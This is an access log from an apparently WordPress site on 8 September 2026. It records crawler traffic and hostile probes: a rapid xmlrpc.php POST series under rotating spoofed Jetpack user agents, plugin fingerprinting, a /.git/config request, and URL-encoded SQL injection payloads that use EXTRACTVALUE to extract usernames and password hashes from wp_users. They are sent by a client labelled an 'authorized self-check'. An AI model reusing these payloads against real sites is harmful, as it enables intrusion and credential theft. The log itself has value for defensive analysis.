151.123.177.214 - - [08/Sep/2026:17:29:37 +0200] "GET /wp-includes/version.php HTTP/1.1" 403 41341 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
34.175.56.187 - - [08/Sep/2026:17:29:46 +0200] "GET /robots.txt HTTP/1.1" 200 84 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:29:46 +0200] "GET / HTTP/1.1" 200 41339 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
50.87.253.215 - - [08/Sep/2026:17:29:58 +0200] "GET /wp-login.php HTTP/1.1" 200 41342 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.0.0 Safari/537.36"
104.207.37.85 - - [08/Sep/2026:17:30:05 +0200] "GET /wp-json/ HTTP/1.1" 200 41339 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
104.207.37.85 - - [08/Sep/2026:17:30:08 +0200] "GET /?rest_route=/ HTTP/1.1" 200 41339 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:30:10 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.0; WordPress 6.3)"
34.175.56.187 - - [08/Sep/2026:17:30:13 +0200] "GET /llms.txt HTTP/1.1" 503 468 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:13 +0200] "GET /.well-known/oauth-protected-resource HTTP/1.1" 503 468 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:13 +0200] "GET /.well-known/acp.json HTTP/1.1" 503 468 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:17 +0200] "GET /sitemap.xml HTTP/1.1" 200 426004 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:13 +0200] "GET /auth.md HTTP/1.1" 503 34653 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:13 +0200] "GET /.well-known/api-catalog HTTP/1.1" 503 468 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:13 +0200] "GET /.well-known/agents.json HTTP/1.1" 503 468 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:13 +0200] "GET /.well-known/ai-catalog.json HTTP/1.1" 503 468 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:13 +0200] "GET /.well-known/http-message-signatures-directory HTTP/1.1" 503 468 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:30:16 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
34.175.56.187 - - [08/Sep/2026:17:30:13 +0200] "GET /agents.md HTTP/1.1" 200 41339 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:13 +0200] "GET /openapi.json HTTP/1.1" 200 41339 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:13 +0200] "GET /.well-known/agent-skills/index.json HTTP/1.1" 503 34653 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:13 +0200] "GET / HTTP/1.1" 503 - "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:16 +0200] "GET /.well-known/ucp HTTP/1.1" 503 468 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:18 +0200] "GET /.well-known/oauth-authorization-server HTTP/1.1" 503 34653 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:19 +0200] "GET /.well-known/mcp/server-card.json HTTP/1.1" 200 41339 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:20 +0200] "GET /mcp HTTP/1.1" 503 468 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:20 +0200] "GET /.well-known/mcp.json HTTP/1.1" 503 468 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:19 +0200] "GET /.well-known/openid-configuration HTTP/1.1" 503 468 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:21 +0200] "GET /sse HTTP/1.1" 200 41339 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:19 +0200] "GET /.well-known/mcp-server.json HTTP/1.1" 200 41339 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:22 +0200] "GET /api/mcp HTTP/1.1" 200 41339 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:23 +0200] "GET /.well-known/agent-card.json HTTP/1.1" 200 41339 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:25 +0200] "GET /.well-known/webmcp.json HTTP/1.1" 200 41339 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:22 +0200] "GET /.well-known/agent.json HTTP/1.1" 200 41339 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
34.175.56.187 - - [08/Sep/2026:17:30:23 +0200] "GET /.well-known/webmcp HTTP/1.1" 200 41339 "-" "AgentRadar-Research/1.0 (BCG Henderson Institute; agentic-web-research)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:30:26 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
104.207.39.234 - - [08/Sep/2026:17:30:32 +0200] "GET /readme.html HTTP/1.1" 200 7425 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
104.207.39.234 - - [08/Sep/2026:17:30:34 +0200] "GET /license.txt HTTP/1.1" 200 19903 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
104.207.39.234 - - [08/Sep/2026:17:30:36 +0200] "GET /wp-includes/version.php HTTP/1.1" 403 41340 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:30:37 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.4)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:30:48 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.0; WordPress 6.3)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:30:58 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.0; WordPress 6.4)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:31:09 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.0; WordPress/6.1; http://site19659410.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:31:20 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.4)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:31:30 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:31:41 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.3)"
45.3.49.13 - - [08/Sep/2026:17:31:43 +0200] "GET /feed/ HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:31:52 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/13.0; WordPress/6.1; http://site92061619.com"
45.3.49.13 - - [08/Sep/2026:17:31:56 +0200] "GET /?feed=rss2 HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:32:02 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:32:12 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:32:13 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.3)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:32:24 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.5; WordPress/6.4; http://site10630229.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:32:34 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:32:45 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.0; WordPress/6.4; http://site53698113.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:32:56 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.1; WordPress/6.2; http://site65847373.com"
157.55.39.225 - - [08/Sep/2026:17:33:00 +0200] "GET /robots.txt HTTP/1.1" 304 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.235 - - [08/Sep/2026:17:33:04 +0200] "GET /sitemap.xml.gz HTTP/1.1" 404 41339 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:33:07 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.5; WordPress/6.2; http://site57355554.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:33:17 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:33:28 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:33:39 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:33:49 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.3)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:34:00 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:34:11 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:34:21 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:34:29 +0200] "GET /wp-content/plugins/wp-ticket/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:34:32 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:34:43 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:34:46 +0200] "GET /wp-content/plugins/wp-ticket/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:34:53 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
45.3.49.13 - - [08/Sep/2026:17:35:01 +0200] "GET /?s=x%27%29+UNION+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2CEXTRACTVALUE%281%2CCONCAT%280x7e%2C%28SELECT+GROUP_CONCAT%28CONCAT%28user_login%2C0x3a%2Cuser_pass%29+SEPARATOR+%27%7C%27%29+FROM+wp_users+LIMIT+5%29%29%29%2C9--+- HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:35:04 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.0; WordPress/6.2; http://site91438157.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:35:15 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
45.3.49.13 - - [08/Sep/2026:17:35:22 +0200] "GET /search/?s=x%27%29+UNION+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2CEXTRACTVALUE%281%2CCONCAT%280x7e%2C%28SELECT+GROUP_CONCAT%28CONCAT%28user_login%2C0x3a%2Cuser_pass%29+SEPARATOR+%27%7C%27%29+FROM+wp_users+LIMIT+5%29%29%29%2C9--+- HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:35:25 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.1; WordPress/6.3; http://site67883448.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:35:36 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:35:36 +0200] "GET /?s=x%27%29+UNION+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2CEXTRACTVALUE%281%2CCONCAT%280x7e%2C%28SELECT+GROUP_CONCAT%28CONCAT%28user_login%2C0x3a%2Cuser_pass%29+SEPARATOR+%27%7C%27%29+FROM+wp_users+LIMIT+5%29%29%29%2C9--+- HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:35:46 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.0; WordPress/6.2; http://site88382115.com"
45.3.49.13 - - [08/Sep/2026:17:35:55 +0200] "GET /wp-content/plugins/wp-automatic/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:35:57 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:36:08 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:36:15 +0200] "GET /wp-content/plugins/wp-automatic/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:36:18 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:36:29 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.3)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:36:40 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.1)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:36:50 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.1)"
45.3.49.13 - - [08/Sep/2026:17:36:54 +0200] "GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:37:02 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.1; WordPress/6.1; http://site75091336.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:37:12 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.2)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:37:23 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.4)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:37:34 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.3)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:37:45 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
45.3.49.13 - - [08/Sep/2026:17:37:51 +0200] "GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:37:55 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:38:04 +0200] "GET / HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:38:06 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
45.3.49.13 - - [08/Sep/2026:17:38:15 +0200] "GET /wp-content/plugins/gamipress/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:38:17 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/13.0; WordPress/6.3; http://site39793341.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:38:27 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.1; WordPress/6.2; http://site99889106.com"
45.3.49.13 - - [08/Sep/2026:17:38:35 +0200] "GET /wp-content/plugins/gamipress/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:38:38 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.1; WordPress/6.3; http://site36761102.com"
45.3.49.13 - - [08/Sep/2026:17:38:47 +0200] "GET / HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:38:49 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
45.3.49.13 - - [08/Sep/2026:17:38:59 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 157201 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:38:59 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:39:10 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:39:12 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 157201 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:39:21 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:39:32 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
45.3.49.13 - - [08/Sep/2026:17:39:35 +0200] "GET /wp-content/plugins/userswp/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
136.65.189.251 - - [08/Sep/2026:17:39:39 +0200] "GET /.git/config HTTP/1.1" 200 41340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:39:44 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:39:48 +0200] "GET /wp-content/plugins/userswp/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:39:55 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:40:02 +0200] "GET /users/?uwp_sort_by=display_name%2C%28SELECT+EXTRACTVALUE%281%2CCONCAT%280x7e%2C%28SELECT+GROUP_CONCAT%28CONCAT%28user_login%2C0x3a%2Cuser_pass%29+SEPARATOR+%27%7C%27%29+FROM+wp_users+LIMIT+5%29%29%29%29--+- HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:40:06 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.5; WordPress/6.3; http://site81084206.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:40:16 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
45.3.49.13 - - [08/Sep/2026:17:40:17 +0200] "GET /members/?uwp_sort_by=display_name%2C%28SELECT+EXTRACTVALUE%281%2CCONCAT%280x7e%2C%28SELECT+GROUP_CONCAT%28CONCAT%28user_login%2C0x3a%2Cuser_pass%29+SEPARATOR+%27%7C%27%29+FROM+wp_users+LIMIT+5%29%29%29%29--+- HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:40:27 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.4)"
45.3.49.13 - - [08/Sep/2026:17:40:33 +0200] "GET /user-list/?uwp_sort_by=display_name%2C%28SELECT+EXTRACTVALUE%281%2CCONCAT%280x7e%2C%28SELECT+GROUP_CONCAT%28CONCAT%28user_login%2C0x3a%2Cuser_pass%29+SEPARATOR+%27%7C%27%29+FROM+wp_users+LIMIT+5%29%29%29%29--+- HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:40:38 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
45.3.49.13 - - [08/Sep/2026:17:40:45 +0200] "GET /member-directory/?uwp_sort_by=display_name%2C%28SELECT+EXTRACTVALUE%281%2CCONCAT%280x7e%2C%28SELECT+GROUP_CONCAT%28CONCAT%28user_login%2C0x3a%2Cuser_pass%29+SEPARATOR+%27%7C%27%29+FROM+wp_users+LIMIT+5%29%29%29%29--+- HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:40:49 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.3)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:41:00 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/12.1; WordPress/6.2; http://site70602533.com"
45.3.49.13 - - [08/Sep/2026:17:41:00 +0200] "GET /directory/?uwp_sort_by=display_name%2C%28SELECT+EXTRACTVALUE%281%2CCONCAT%280x7e%2C%28SELECT+GROUP_CONCAT%28CONCAT%28user_login%2C0x3a%2Cuser_pass%29+SEPARATOR+%27%7C%27%29+FROM+wp_users+LIMIT+5%29%29%29%29--+- HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:41:10 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com"
45.3.49.13 - - [08/Sep/2026:17:41:11 +0200] "GET /all-users/?uwp_sort_by=display_name%2C%28SELECT+EXTRACTVALUE%281%2CCONCAT%280x7e%2C%28SELECT+GROUP_CONCAT%28CONCAT%28user_login%2C0x3a%2Cuser_pass%29+SEPARATOR+%27%7C%27%29+FROM+wp_users+LIMIT+5%29%29%29%29--+- HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:41:21 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack/13.0; WordPress/6.3; http://site11332502.com"
45.3.49.13 - - [08/Sep/2026:17:41:22 +0200] "GET /wp-content/plugins/bookingpress-appointment-booking/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:41:32 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:41:33 +0200] "GET /wp-content/plugins/bookingpress-appointment-booking/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:41:43 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:41:44 +0200] "GET / HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
